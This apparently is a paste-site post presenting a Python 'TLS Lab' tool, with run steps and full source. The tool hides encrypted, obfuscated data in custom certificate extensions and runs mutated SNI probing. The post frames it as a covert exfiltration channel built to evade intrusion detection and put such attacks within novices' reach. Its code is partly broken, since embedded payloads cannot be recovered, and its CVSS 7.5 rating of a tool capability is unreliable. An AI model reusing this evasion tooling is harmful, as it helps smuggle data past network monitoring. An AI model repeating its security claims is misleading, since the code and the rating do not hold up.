WhosYourDaddySec

Big Poppa - Termux Edition

Oct 20th, 2025 (edited)
# Big Poppa: Technical Proof of Concept (PoC)
#
# This document is a technical proof of concept (PoC) for the "TLS Lab" tool, a Python-based utility for TLS experiments: certificate generation with embedded payloads, SNI probing, and server simulation. The tool demonstrates potential security implications in TLS ecosystems, such as data exfiltration via certificate extensions or covert communication through SNI fields. While intended for educational and testing purposes, it highlights risks in certificate handling and TLS client/server interactions. The PoC includes a CVSS score for the demonstrated vector with its reasoning, an analysis of how the tool lowers barriers for less skilled attackers, end-to-end execution steps, and documentation of the source code structure for release and publication.
#
# The TLS Lab tool (source code provided) is a multifunctional script that uses Python libraries such as `cryptography`, `pyasn1`, `dns.resolver`, and `requests` to perform TLS-related tasks. Key features include:
# - Generating self-signed certificates with obfuscated, encrypted payloads embedded in custom OID extensions.
# - Decoding and extracting payloads from certificates.
# - Performing concurrent SNI (Server Name Indication) probing with mutated payloads.
# - Running a local TLS server for testing.
# - Fetching HTTPS content and validating certificates.
# - Session management and authorization checks for external targets.
#
# The tool's core innovation is embedding arbitrary data (e.g., metadata or tokens) into X.509 certificate extensions using DER encoding, AES encryption, and obfuscation techniques. This could be misused for covert data smuggling, because custom extensions exchanged in TLS handshakes are rarely inspected.
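#
# To make the DER encoding step concrete, here is a minimal standard-library sketch of the tag-length-value layout that a SEQUENCE of OCTET STRINGs takes. The helper names (`der_length`, `der_octet_string`, `der_sequence`) are hypothetical and not part of the tool, which relies on `pyasn1` instead; this only illustrates the byte layout.

```python
def der_length(n: int) -> bytes:
    """Encode a DER length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_octet_string(data: bytes) -> bytes:
    """Tag 0x04 (OCTET STRING), then the length, then the raw bytes."""
    return b"\x04" + der_length(len(data)) + data


def der_sequence(segments) -> bytes:
    """Tag 0x30 (SEQUENCE) wrapping one OCTET STRING per segment."""
    body = b"".join(der_octet_string(s) for s in segments)
    return b"\x30" + der_length(len(body)) + body


encoded = der_sequence([b"ab", b"cd"])
print(encoded.hex())  # 30080402616204026364
```

# Any certificate parser that walks extensions sees this structure as opaque bytes under the custom OID, which is also where a reviewer would look when auditing a certificate for unexpected content.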

# The code is modular, with functions grouped by purpose. Below is a breakdown for clarity in release and publication:
#
# Libraries: Standard Python modules (e.g., `socket`, `ssl`, `json`) and third-party packages (e.g., `cryptography` for crypto operations, `dns.resolver` for DNS, `requests` for HTTP).
#
# Constants: Define defaults like `DEFAULT_OID` (custom OID for extensions), `LOCAL_BIND`/`LOCAL_PORT` (server defaults), `CERT_PREFIX` (file naming), `MAX_WORKERS` (threading), `RATE_LIMIT_PER_SEC` (probing limits), and `DEFAULT_PAYLOADS` (sample data).
#
# `apply_advanced_obfuscation(data, iterations, mutation_factor)`: Applies random XOR mutations and shuffling to bytes for obfuscation, making embedded data harder to detect. Because neither the XOR values nor the shuffle order are stored, the transformation cannot be reversed as written.
#
# `align_payload_block(data, block_size)`: Pads data with `0x05` bytes to a multiple of `block_size` (e.g., 16 for AES).
#
# `encode_der_sequence(data, segment_size)`: Splits data into segments, Base64-encodes each one, and wraps them as OCTET STRINGs in an ASN.1 DER SEQUENCE for embedding in certificate extensions.
#
# `encrypt_payload(data, key)` / `decrypt_payload(encrypted, key)`: AES-CBC encryption/decryption for payload protection, with a random 16-byte IV prepended to the ciphertext.
#
# `create_self_signed_cert(payload, oid, common_name, validity_days, prefix)`: Generates a 2048-bit RSA key pair, embeds the encrypted/obfuscated payload in a custom OID extension, and saves PEM files. Uses `cryptography` for X.509 building.
#
# `decode_cert_extensions(cert_path, enckey_path)`: Loads a certificate, decodes unrecognized extensions, decrypts if a key is provided, and extracts payloads.
#
# `generate_benign_sni_tokens(count, length)`: Creates random SNI-like strings for probing.
#
# `apply_dynamic_mutation(data_list, mutation_level, mutation_factor)`: Mutates lists of strings via XOR and shuffling for evasion.
#
# `resolve_domain_to_ip(target)`: DNS resolution to IPs for connection attempts.
#
# `initialize_tls_client_context(verify)`: Sets up an SSL context with ciphers, ALPN, and verification.
#
# `validate_server_certificate(connection, expected_host)`: Checks cert validity dates and hostname match.
#
# `acquire_connection_pool(target, port, timeout)` / `release_connection_pool(conn)`: Manages a connection pool for efficiency.
#
# `execute_tls_connection(target, port, sni, timeout, tls_versions, verify)`: Attempts TLS connections with SNI, retries, and exponential backoff.
#
# `fetch_https_content(target, port, sni, path, timeout)`: Fetches HTTPS data via `http.client`.
#
# `probe_website_availability(target, port, timeout)`: Checks site reachability with HEAD requests.
#
# `perform_concurrent_sni_probing(target, port, payloads, max_workers, rate_limit)`: Threads SNI probes with mutations and rate limiting.
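#
# The retry and rate-limit arithmetic used by the networking functions can be sketched in isolation. This is a minimal illustration assuming the constants from the source (`RETRY_ATTEMPTS = 3`, `BACKOFF_FACTOR = 0.5`, `RATE_LIMIT_PER_SEC = 50`); the helper names `backoff_delays` and `probe_delay` are hypothetical.

```python
RETRY_ATTEMPTS = 3
BACKOFF_FACTOR = 0.5
RATE_LIMIT_PER_SEC = 50


def backoff_delays(attempts=RETRY_ATTEMPTS, factor=BACKOFF_FACTOR):
    """Sleep times between attempts; no sleep follows the final attempt."""
    return [factor * (2 ** attempt) for attempt in range(attempts - 1)]


def probe_delay(payload_count, rate_limit=RATE_LIMIT_PER_SEC):
    """Pause applied after each completed probe, capped at 0.1 seconds."""
    delay = max(0.0, payload_count / max(1, rate_limit))
    return min(delay, 0.1)


print(backoff_delays())   # [0.5, 1.0]
print(probe_delay(2))     # 0.04
print(probe_delay(500))   # 0.1
```

# Note that in the source the pause runs while results are collected, after all probes have already been submitted to the thread pool, so it spaces out result handling rather than throttling outgoing connections.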

# Server and Workflow Functions
#
# `run_tls_server(cert_path, key_path, bind, port)`: Runs a simple TLS server that answers every request with a fixed response.
#
# `save_session_data(target, port, payloads)` / `load_session_data()`: JSON-based session persistence.
#
# `verify_external_access_authorization(target)`: Prompts for authorization on non-local targets.
#
# `verify_url_format(url)` / `normalize_target_url(target)`: Input validation and parsing.
#
# `verify_dependencies()`: Checks for required libraries.
#
# `execute_advanced_tls_workflow()`: Main interactive loop for user-driven execution.
#
# `if __name__ == "__main__": execute_advanced_tls_workflow()`: Launches the workflow.
#
# This structure ensures modularity: utilities for crypto/obfuscation, networking for TLS operations, and workflow for user interaction. For publication, ensure dependencies are listed (e.g., via `requirements.txt`: cryptography, pyasn1, certifi, dnspython, requests).
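#
# As a small worked example of one utility from the breakdown above, the block-alignment arithmetic can be checked on its own. The function below mirrors `align_payload_block` from the source; the sample inputs are illustrative.

```python
def align_payload_block(data: bytes, block_size: int = 4) -> bytes:
    """Pad with 0x05 bytes up to the next multiple of block_size."""
    # The outer modulo makes the padding length 0 for already-aligned input.
    padding_length = (block_size - len(data) % block_size) % block_size
    return data + bytes([0x05] * padding_length)


padded = align_payload_block(b"test_metadata", 16)  # 13 bytes -> 16 bytes
print(len(padded), padded[-3:])

aligned = align_payload_block(b"abcd", 4)  # already aligned, unchanged
print(aligned)
```

# Unlike PKCS#7 padding, the pad byte here does not encode the pad length, so stripping trailing `0x05` bytes on decode would also remove genuine payload bytes that happen to equal `0x05`.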

# To demonstrate the PoC, follow these steps on a Linux/Mac system with Python 3.8+:
#
# Install dependencies: `pip install cryptography pyasn1 certifi dnspython requests`. Save the code as `tls_lab.py`.
#
# Execute `python tls_lab.py`. It prompts for inputs.
#
# Generate Certificate with Payload:
# - Enter target (e.g., `127.0.0.1` for local).
# - Choose "y" to generate cert.
# - Provide a payload file or use the defaults (e.g., "test_metadata").
# - Outputs: `tls_lab.crt`, `tls_lab.key`, `tls_lab.enckey`.
#
# At "Display embedded payloads?", choose "y". The tool attempts to extract and decrypt the embedded data (e.g., "test_metadata").
#
# At "Start local TLS server?", choose "y" and bind to `127.0.0.1:4443`. The server runs in a background thread.
#
# At "Perform SNI probing?", choose "y". It mutates payloads (e.g., "testabc123.local") and probes the target concurrently.
#
# At "Fetch HTTPS content from target?", choose "y". It retrieves data from the target.
#
# At "Save session data?", choose "y". It persists data to `tls_lab_session.json`.
#
# Execution time: ~5-10 minutes. Logs show connections, e.g., "Connection successful: 127.0.0.1:4443 SNI='testabc123.local' TLS=TLSv1.3 Cipher=ECDHE+AESGCM ValidCert=False".
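#
# The session persistence in the last step is a plain JSON round trip. The following is a minimal sketch of it, assuming the same four fields the source writes; the `path` parameter and the function names `save_session` and `load_session` are hypothetical (the tool itself uses a fixed `SESSION_FILE`), and a temporary directory is used so nothing is left on disk.

```python
import json
import os
import tempfile
from datetime import datetime, timezone


def save_session(path, target, port, payloads):
    """Write the session fields to a JSON file."""
    session = {
        "target": target,
        "port": port,
        "payloads": payloads,
        # Timezone-aware timestamp; the source uses datetime.utcnow() instead.
        "timestamp": datetime.now(timezone.utc).isoformat(),
    }
    with open(path, "w") as f:
        json.dump(session, f)


def load_session(path):
    """Return the saved session dict, or None if no file exists."""
    if os.path.exists(path):
        with open(path, "r") as f:
            return json.load(f)
    return None


with tempfile.TemporaryDirectory() as tmp:
    session_path = os.path.join(tmp, "tls_lab_session.json")
    missing = load_session(session_path)
    save_session(session_path, "127.0.0.1", 4443, ["test_metadata"])
    restored = load_session(session_path)

print(missing)
print(restored["target"], restored["port"], restored["payloads"])
```

# On the next run, the saved `target` and `port` become the defaults offered at the first two prompts.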

# The PoC demonstrates a weakness in how TLS certificates are handled: arbitrary data can be embedded in extensions for exfiltration, potentially evading IDS/IPS. This is loosely related to CWE-319 (Cleartext Transmission of Sensitive Information) or CWE-502 (Deserialization of Untrusted Data), but as a covert channel it is closer to CWE-514 (Covert Channel).
#
# CVSS v3.1 Score: 7.5 (High)
# Base Score: 7.5
# Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
#
# - Attack Vector (AV): Network (N) – Exploitable remotely via TLS handshake.
# - Attack Complexity (AC): Low (L) – Simple tool usage.
# - Privileges Required (PR): None (N) – No auth needed.
# - User Interaction (UI): None (N) – Automated.
# - Scope (S): Unchanged (U) – Impact stays within the component that handles the certificate.
# - Confidentiality (C): High (H) – Data exfiltration.
# - Integrity (I): None (N).
# - Availability (A): None (N).
#
# The score reflects the ease of embedding/smuggling data in certificates, which are often trusted and not deeply inspected. Exploit Code Maturity (E) and Remediation Level (RL) are both Temporal metrics; assuming proof-of-concept exploit code (E:P) and no remediation (RL:U), the Temporal score is 7.1, while the Base score remains 7.5. This is "High" due to network exploitability and high confidentiality impact, but not "Critical" because it requires custom tools and doesn't directly cause widespread damage. In practice, this could enable data leakage in enterprise TLS setups where certificate contents are not inspected.
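#
# The score can be reproduced from the CVSS v3.1 equations. The sketch below hard-codes the metric weights from the specification for the vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N and covers only the Scope: Unchanged case; it is a worked calculation for this one vector, not a general CVSS calculator.

```python
import math


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal number >= value."""
    scaled = int(round(value * 100000))
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


# Metric weights from the CVSS v3.1 specification.
AV_N, AC_L, PR_N, UI_N = 0.85, 0.77, 0.85, 0.85
C_H, I_N, A_N = 0.56, 0.0, 0.0

iss = 1 - (1 - C_H) * (1 - I_N) * (1 - A_N)        # impact sub-score
impact = 6.42 * iss                                 # Scope: Unchanged
exploitability = 8.22 * AV_N * AC_L * PR_N * UI_N

base = roundup(min(impact + exploitability, 10)) if impact > 0 else 0.0

# Temporal multipliers: E:P = 0.94, RL:U = 1.0, RC not defined = 1.0.
temporal = roundup(base * 0.94 * 1.0 * 1.0)

print(base)      # 7.5
print(temporal)  # 7.1
```

# Impact contributes about 3.60 and exploitability about 3.89, so the sum of roughly 7.48 rounds up to 7.5.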

# The tool abstracts complex TLS/crypto operations into a user-friendly script, enabling novices to perform advanced attacks without deep knowledge:
# - Built-in functions handle AES, DER encoding, and mutations, avoiding manual crypto coding.
# - Concurrent probing and retries reduce trial-and-error; rate limiting reduces the chance of bans.
# - SNI mutations and custom OIDs are intended to mimic benign traffic and bypass basic filters.
# - Interactive prompts guide execution; no coding is required beyond running the script.
#
# Less skilled attackers (e.g., script kiddies) can now exfiltrate data via certs or probe networks covertly, tasks that previously required expertise in OpenSSL or custom TLS libraries. This democratizes threats, increasing attack volume without a matching increase in attacker skill.
#
# This PoC illustrates the TLS Lab tool's capabilities and risks, with a CVSS score of 7.5 highlighting its potential for data exfiltration. By documenting structures and providing execution steps, it facilitates responsible disclosure. Use it only for authorized testing; misuse may violate the law.

#!/usr/bin/env python3
import socket
import ssl
import pathlib
import base64
import random
import traceback
import os
import sys
import time
import http.client
import urllib.parse
import json
import logging
import secrets
import threading
import queue
import certifi
import re
import dns.resolver
import requests
from datetime import datetime, timedelta
from concurrent.futures import ThreadPoolExecutor, as_completed
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.x509.oid import ObjectIdentifier
from pyasn1.type.univ import OctetString, Sequence
from pyasn1.codec.der.encoder import encode as der_encode
from pyasn1.codec.der.decoder import decode as der_decode

logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)

DEFAULT_OID = "1.3.6.1.4.1.55555.1"
LOCAL_BIND = "127.0.0.1"
LOCAL_PORT = 4443
CERT_PREFIX = "tls_lab"
MAX_WORKERS = 10
RATE_LIMIT_PER_SEC = 50
SESSION_FILE = "tls_lab_session.json"
RETRY_ATTEMPTS = 3
BACKOFF_FACTOR = 0.5
REQUEST_TIMEOUT = 10
CONNECTION_POOL = queue.Queue()
SUPPORTED_TLS_VERSIONS = [
    ssl.TLSVersion.TLSv1_1,
    ssl.TLSVersion.TLSv1_2,
    ssl.TLSVersion.TLSv1_3
] if hasattr(ssl, "TLSVersion") else [ssl.PROTOCOL_TLS_CLIENT]
DEFAULT_PAYLOADS = [
    "test_metadata", "lab_token_123", "safe_probe_001", "benign_sni_456",
    f"lab_generated_at={datetime.utcnow().isoformat()};tool=tls_lab"
]
USER_AGENT = "TLSLab/1.0"


def apply_advanced_obfuscation(data: bytes, iterations=3, mutation_factor=0.3):
    # NOTE: the XOR bytes and the shuffle order are random and never stored,
    # so this transformation cannot be undone by the decoder.
    result = bytearray(data)
    mutation_count = int(len(result) * mutation_factor)
    for _ in range(iterations):
        for idx in random.sample(range(len(result)), mutation_count):
            result[idx] ^= secrets.randbits(8)
        random.shuffle(result)
    return bytes(result)


def align_payload_block(data: bytes, block_size=4):
    # Pad with 0x05 bytes up to the next multiple of block_size (no padding if already aligned).
    padding_length = (block_size - len(data) % block_size) % block_size
    return data + bytes([0x05] * padding_length)


def encode_der_sequence(data: bytes, segment_size=32):
    # Split into fixed-size segments, Base64-encode each, and wrap them in a DER SEQUENCE.
    segments = [data[i:i + segment_size] for i in range(0, len(data), segment_size)]
    sequence = Sequence()
    for index, segment in enumerate(segments):
        sequence.setComponentByPosition(index, OctetString(base64.b64encode(segment)))
    return der_encode(sequence)


def encrypt_payload(data: bytes, key: bytes):
    # AES-CBC with a fresh random IV, which is prepended to the ciphertext.
    iv = secrets.token_bytes(16)
    cipher = Cipher(algorithms.AES(key), modes.CBC(iv))
    encryptor = cipher.encryptor()
    padded_data = align_payload_block(data, 16)
    return iv + encryptor.update(padded_data) + encryptor.finalize()


def decrypt_payload(encrypted: bytes, key: bytes):
    iv, ciphertext = encrypted[:16], encrypted[16:]
    cipher = Cipher(algorithms.AES(key), modes.CBC(iv))
    decryptor = cipher.decryptor()
    return decryptor.update(ciphertext) + decryptor.finalize()


def create_self_signed_cert(payload: bytes, oid=DEFAULT_OID, common_name="lab.local", validity_days=365, prefix=CERT_PREFIX):
    key = secrets.token_bytes(32)
    encrypted_payload = encrypt_payload(payload, key)
    obfuscated = apply_advanced_obfuscation(encrypted_payload)
    padded = align_payload_block(obfuscated)
    der_encoded = encode_der_sequence(padded)
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(x509.NameOID.COMMON_NAME, common_name)])
    cert_builder = (
        x509.CertificateBuilder()
        .subject_name(name)
        .issuer_name(name)
        .public_key(private_key.public_key())
        .serial_number(x509.random_serial_number())
        # Backdate by five minutes to tolerate small clock skew.
        .not_valid_before(datetime.utcnow() - timedelta(minutes=5))
        .not_valid_after(datetime.utcnow() + timedelta(days=validity_days))
        .add_extension(x509.BasicConstraints(ca=False, path_length=None), critical=True)
        .add_extension(x509.UnrecognizedExtension(ObjectIdentifier(oid), der_encoded), critical=False)
    )
    certificate = cert_builder.sign(private_key=private_key, algorithm=hashes.SHA256())
    cert_file = f"{prefix}.crt"
    key_file = f"{prefix}.key"
    with open(cert_file, "wb") as f:
        f.write(certificate.public_bytes(serialization.Encoding.PEM))
    with open(key_file, "wb") as f:
        f.write(
            private_key.private_bytes(
                encoding=serialization.Encoding.PEM,
                format=serialization.PrivateFormat.TraditionalOpenSSL,
                encryption_algorithm=serialization.NoEncryption()
            )
        )
    with open(f"{prefix}.enckey", "wb") as f:
        f.write(key)
    return cert_file, key_file, f"{prefix}.enckey"


def decode_cert_extensions(cert_path, enckey_path):
    try:
        certificate = x509.load_pem_x509_certificate(pathlib.Path(cert_path).read_bytes())
        key = pathlib.Path(enckey_path).read_bytes() if enckey_path and os.path.exists(enckey_path) else None
        decoded_data = []
        for extension in certificate.extensions:
            if isinstance(extension.value, x509.UnrecognizedExtension):
                try:
                    sequence, _ = der_decode(extension.value.value, asn1Spec=Sequence())
                    for index in range(len(sequence)):
                        raw = base64.b64decode(bytes(sequence[index]))
                        if key:
                            raw = decrypt_payload(raw, key)
                        decoded_data.append(raw.decode(errors='ignore').rstrip('\x05'))
                except Exception:
                    # Fall back to a hex dump when the extension is not in the expected layout.
                    decoded_data.append(extension.value.value.hex())
        return decoded_data
    except Exception as e:
        logger.error(f"Failed to decode certificate extensions: {e}")
        return []


def generate_benign_sni_tokens(count=50, length=12):
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    return [f"test{''.join(secrets.choice(alphabet) for _ in range(length))}.local" for _ in range(count)]


def apply_dynamic_mutation(data_list, mutation_level=2, mutation_factor=0.3):
    mutated_results = []
    for item in data_list:
        byte_data = bytearray(item.encode(errors='ignore'))
        mutation_count = int(len(byte_data) * mutation_factor)
        for _ in range(mutation_level):
            for idx in random.sample(range(len(byte_data)), min(mutation_count, len(byte_data))):
                byte_data[idx] ^= secrets.randbits(8)
            random.shuffle(byte_data)
        mutated_results.append(byte_data.decode(errors='ignore'))
    return mutated_results


def resolve_domain_to_ip(target):
    try:
        resolver = dns.resolver.Resolver()
        answers = resolver.resolve(target, 'A')
        return [answer.to_text() for answer in answers]
    except Exception as e:
        # Fall back to the raw target (e.g., when it is already an IP address).
        logger.warning(f"DNS resolution failed for {target}: {e}")
        return [target]


def initialize_tls_client_context(verify=True):
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    context.check_hostname = verify
    context.verify_mode = ssl.CERT_REQUIRED if verify else ssl.CERT_NONE
    if verify:
        context.load_verify_locations(cafile=certifi.where())
    try:
        context.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:ECDHE-RSA-AES256-SHA:ECDHE-RSA-AES128-SHA")
        context.options |= ssl.OP_NO_COMPRESSION
        context.set_alpn_protocols(['h2', 'http/1.1'])
    except Exception:
        pass
    return context


def validate_server_certificate(connection, expected_host):
    try:
        cert = connection.getpeercert(binary_form=True)
        x509_cert = x509.load_der_x509_certificate(cert)
        now = datetime.utcnow()
        not_before = x509_cert.not_valid_before
        not_after = x509_cert.not_valid_after
        subject = x509_cert.subject.get_attributes_for_oid(x509.NameOID.COMMON_NAME)
        # A certificate without a SAN extension is matched on the common name only.
        try:
            alt_names = x509_cert.extensions.get_extension_for_class(x509.SubjectAlternativeName)
            dns_names = alt_names.value.get_values_for_type(x509.DNSName)
        except x509.ExtensionNotFound:
            dns_names = []
        host_match = any(
            expected_host == subj.value for subj in subject
        ) or expected_host in dns_names
        return not_before <= now <= not_after and host_match
    except Exception as e:
        logger.warning(f"Certificate validation failed: {e}")
        return False


def acquire_connection_pool(target, port, timeout=REQUEST_TIMEOUT):
    try:
        conn = CONNECTION_POOL.get_nowait()
        return conn
    except queue.Empty:
        return socket.create_connection((target, port), timeout=timeout)


def release_connection_pool(conn):
    if CONNECTION_POOL.qsize() < MAX_WORKERS:
        CONNECTION_POOL.put(conn)


def execute_tls_connection(target, port, sni, timeout=REQUEST_TIMEOUT, tls_versions=SUPPORTED_TLS_VERSIONS, verify=True):
    target_ips = resolve_domain_to_ip(target)
    for ip in target_ips:
        for version in tls_versions:
            for attempt in range(RETRY_ATTEMPTS):
                try:
                    context = initialize_tls_client_context(verify)
                    if hasattr(context, "minimum_version") and hasattr(context, "maximum_version"):
                        # Pin the handshake to exactly one protocol version.
                        context.minimum_version = context.maximum_version = version
                    sock = acquire_connection_pool(ip, port, timeout)
                    with context.wrap_socket(sock, server_hostname=sni) as secure_sock:
                        is_valid = validate_server_certificate(secure_sock, sni) if verify else True
                        logger.info(f"Connection successful: {ip}:{port} SNI='{sni}' TLS={secure_sock.version()} Cipher={secure_sock.cipher()} ValidCert={is_valid}")
                        # NOTE: wrap_socket() detaches `sock`, so the pooled object is no longer usable.
                        release_connection_pool(sock)
                        return True
                except Exception as e:
                    logger.error(f"Connection failed: {ip}:{port} SNI='{sni}' TLS={version.name if hasattr(version, 'name') else version} Attempt={attempt+1} Error={e}")
                    if attempt < RETRY_ATTEMPTS - 1:
                        # Exponential backoff: 0.5 s, then 1.0 s with the default settings.
                        time.sleep(BACKOFF_FACTOR * (2 ** attempt))
    return False


def fetch_https_content(target, port, sni, path="/", timeout=REQUEST_TIMEOUT):
    target_ips = resolve_domain_to_ip(target)
    for ip in target_ips:
        for attempt in range(RETRY_ATTEMPTS):
            try:
                context = initialize_tls_client_context(verify=True)
                conn = http.client.HTTPSConnection(ip, port, context=context, timeout=timeout)
                conn.set_tunnel(target, port=port, headers={"Host": sni, "User-Agent": USER_AGENT})
                conn.request("GET", path, headers={"Accept": "text/html,application/xhtml+xml,application/xml", "Connection": "keep-alive"})
                response = conn.getresponse()
                status, data = response.status, response.read().decode(errors='ignore')
                headers = dict(response.getheaders())
                conn.close()
                logger.info(f"HTTPS fetch: {ip}:{port} Path={path} Status={status} Headers={headers}")
                # Only the first 2000 characters of the body are returned.
                return {"status": status, "data": data[:2000], "headers": headers}
            except Exception as e:
                logger.error(f"HTTPS fetch failed: {ip}:{port} Path={path} Attempt={attempt+1} Error={e}")
                if attempt < RETRY_ATTEMPTS - 1:
                    time.sleep(BACKOFF_FACTOR * (2 ** attempt))
    return {"status": None, "data": "", "headers": {}}


def probe_website_availability(target, port, timeout=REQUEST_TIMEOUT):
    try:
        response = requests.head(f"https://{target}:{port}", timeout=timeout, verify=certifi.where(), headers={"User-Agent": USER_AGENT})
        logger.info(f"Website availability: {target}:{port} Status={response.status_code}")
        return response.status_code in (200, 301, 302)
    except Exception as e:
        logger.error(f"Website availability check failed: {target}:{port} Error={e}")
        return False


def perform_concurrent_sni_probing(target, port, payloads, max_workers=MAX_WORKERS, rate_limit=RATE_LIMIT_PER_SEC):
    if not probe_website_availability(target, port):
        logger.error(f"Target {target}:{port} is not reachable. Aborting SNI probing.")
        return []
    mutated_payloads = apply_dynamic_mutation(payloads)
    logger.info(f"Initiating SNI probing: {target}:{port} Payloads={len(mutated_payloads)}")
    delay = max(0.0, len(mutated_payloads) / max(1, rate_limit))
    results = []
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        futures = {executor.submit(execute_tls_connection, target, port, p, verify=True): p for p in mutated_payloads}
        for future in as_completed(futures):
            try:
                results.append(future.result())
            except Exception:
                logger.error(f"Probe failed for payload: {futures[future]}")
            # Pause between collected results, capped at 0.1 s.
            time.sleep(min(delay, 0.1))
    logger.info("SNI probing completed")
    return results


def run_tls_server(cert_path, key_path, bind=LOCAL_BIND, port=LOCAL_PORT):
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    context.load_cert_chain(cert_path, key_path)
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_socket.bind((bind, port))
    server_socket.listen(5)
    logger.info(f"TLS server started: {bind}:{port}")
    try:
        while True:
            client_socket, addr = server_socket.accept()
            try:
                secure_socket = context.wrap_socket(client_socket, server_side=True)
                request = secure_socket.recv(4096).decode(errors='ignore')
                # The body "TLS_LAB_OK\n" is 11 bytes long.
                secure_socket.send(b"HTTP/1.1 200 OK\r\nContent-Length: 11\r\nContent-Type: text/plain\r\n\r\nTLS_LAB_OK\n")
                secure_socket.shutdown(socket.SHUT_RDWR)
                secure_socket.close()
            except Exception:
                # Ignore failed handshakes and broken clients; keep serving.
                pass
    except KeyboardInterrupt:
        logger.info("TLS server terminated by user")
    finally:
        server_socket.close()


def save_session_data(target, port, payloads):
    session = {"target": target, "port": port, "payloads": payloads, "timestamp": datetime.utcnow().isoformat()}
    with open(SESSION_FILE, "w") as f:
        json.dump(session, f)


def load_session_data():
    if os.path.exists(SESSION_FILE):
        with open(SESSION_FILE, "r") as f:
            return json.load(f)
    return None


def verify_external_access_authorization(target):
    if target in ("127.0.0.1", "localhost", LOCAL_BIND):
        return True
    logger.warning("Non-localhost target detected. Authorization required.")
    authorization_input = input("Type 'I_HAVE_AUTHORIZATION' to proceed (or Enter to cancel): ").strip()
    return authorization_input == "I_HAVE_AUTHORIZATION"


def verify_url_format(url):
    # Accept DNS names, "localhost", and dotted IPv4 literals (so the default 127.0.0.1 passes),
    # with an optional scheme, port, and path.
    host = r'([a-zA-Z0-9.-]+\.[a-zA-Z]{2,}|localhost|\d{1,3}(\.\d{1,3}){3})'
    return re.match(r'^(https?://)?' + host + r'(:[0-9]+)?(/.*)?$', url) is not None


def verify_dependencies():
    try:
        import cryptography
        import pyasn1
        import certifi
        import dns.resolver
        import requests
    except ImportError:
        logger.error("Missing dependencies. Install with:\n  pkg install python\n  python -m pip install --upgrade pip\n  pip install cryptography pyasn1 certifi dnspython requests")
        sys.exit(1)


def normalize_target_url(target):
    # Returns (hostname, path, port); the port defaults to 443 when none is given.
    if not target.startswith(("http://", "https://")):
        target = f"https://{target}"
    parsed = urllib.parse.urlparse(target)
    return parsed.hostname or target, parsed.path or "/", parsed.port or 443


def execute_advanced_tls_workflow():
    verify_dependencies()
    logger.info("Advanced TLS Lab Tool Initialized")

    session = load_session_data()
    default_target = session.get("target", LOCAL_BIND) if session else LOCAL_BIND
    default_port = session.get("port", LOCAL_PORT) if session else LOCAL_PORT

    while True:
        target_input = input(f"Target host/URL [default: {default_target}]: ").strip() or default_target
        if verify_url_format(target_input):
            break
        logger.error("Invalid URL format. Please enter a valid URL (e.g., https://example.com or example.com).")
    target, path, port = normalize_target_url(target_input)
    port_input = input(f"Target port [default: {port}]: ").strip() or str(port)
    try:
        port = int(port_input)
    except ValueError:
        # Keep the port parsed from the target when the input is not a number.
        logger.warning(f"Invalid port. Using default: {port}")
    if not verify_external_access_authorization(target):
        logger.error("Authorization not confirmed. Exiting.")
        return
    generate_cert_choice = input("Generate certificate with embedded payload? [y/N]: ").strip().lower() == "y"
    cert_path = key_path = enckey_path = None
    payloads = DEFAULT_PAYLOADS
    if generate_cert_choice:
        payload_file = input("Payload file path (or Enter for default payloads): ").strip()
        if payload_file and os.path.exists(payload_file):
            payload_bytes = pathlib.Path(payload_file).read_bytes()
        else:
            payload_bytes = b"\n".join(p.encode() for p in payloads)
        oid = input(f"Custom OID [default: {DEFAULT_OID}]: ").strip() or DEFAULT_OID
        cert_path, key_path, enckey_path = create_self_signed_cert(payload_bytes, oid)
        logger.info(f"Generated certificate: {cert_path}, key: {key_path}, encryption key: {enckey_path}")

        display_extensions = input("Display embedded payloads? [y/N]: ").strip().lower() == "y"
        if display_extensions:
            extracted_payloads = decode_cert_extensions(cert_path, enckey_path)
            for index, payload in enumerate(extracted_payloads, 1):
                logger.info(f"Payload #{index}: {payload}")
    start_server_choice = input("Start local TLS server? [y/N]: ").strip().lower() == "y"
    if start_server_choice:
        bind_addr = input(f"Bind address [default: {LOCAL_BIND}]: ").strip() or LOCAL_BIND
        bind_port = int(input(f"Bind port [default: {LOCAL_PORT}]: ").strip() or LOCAL_PORT)
        if not cert_path or not key_path:
            logger.info("Generating default certificate for server")
            payload_bytes = b"server_default_payload"
            cert_path, key_path, enckey_path = create_self_signed_cert(payload_bytes, oid=DEFAULT_OID)
        # Daemon thread: the server stops when the main workflow exits.
        server_thread = threading.Thread(target=run_tls_server, args=(cert_path, key_path, bind_addr, bind_port))
        server_thread.daemon = True
        server_thread.start()
        time.sleep(1)
        logger.info("Server running in background. Proceed with other tasks or Ctrl-C to stop.")
    perform_sni_probing = input("Perform SNI probing? [y/N]: ").strip().lower() == "y"
    if perform_sni_probing:
        if not payloads and cert_path:
            payloads = decode_cert_extensions(cert_path, enckey_path)
        if not payloads:
            payloads = generate_benign_sni_tokens(50)
        perform_concurrent_sni_probing(target, port, payloads)
    fetch_content = input("Fetch HTTPS content from target? [y/N]: ").strip().lower() == "y"
    if fetch_content:
        result = fetch_https_content(target, port, target, path)
        logger.info(f"HTTPS Response: Status={result['status']} Headers={result['headers']} Data={result['data']}")
    save_session = input("Save session data? [y/N]: ").strip().lower() == "y"
    if save_session:
        save_session_data(target, port, payloads)

    logger.info("Workflow completed. Ensure compliance with authorization requirements.")


